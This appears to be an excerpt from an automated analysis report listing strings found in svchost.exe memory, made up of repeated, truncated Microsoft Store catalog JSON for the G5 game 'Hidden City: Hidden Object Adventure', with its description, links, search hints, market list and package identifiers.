onSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-04-06T17:58:28.3925008Z\|\|.\|\|9f1af5de-a917-4d59-b623-fd59991517bf\|\|1152921505693355901\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-04-06T17:57:25.3126054Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 0000000F.00000003.439276219.00000221A4002000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 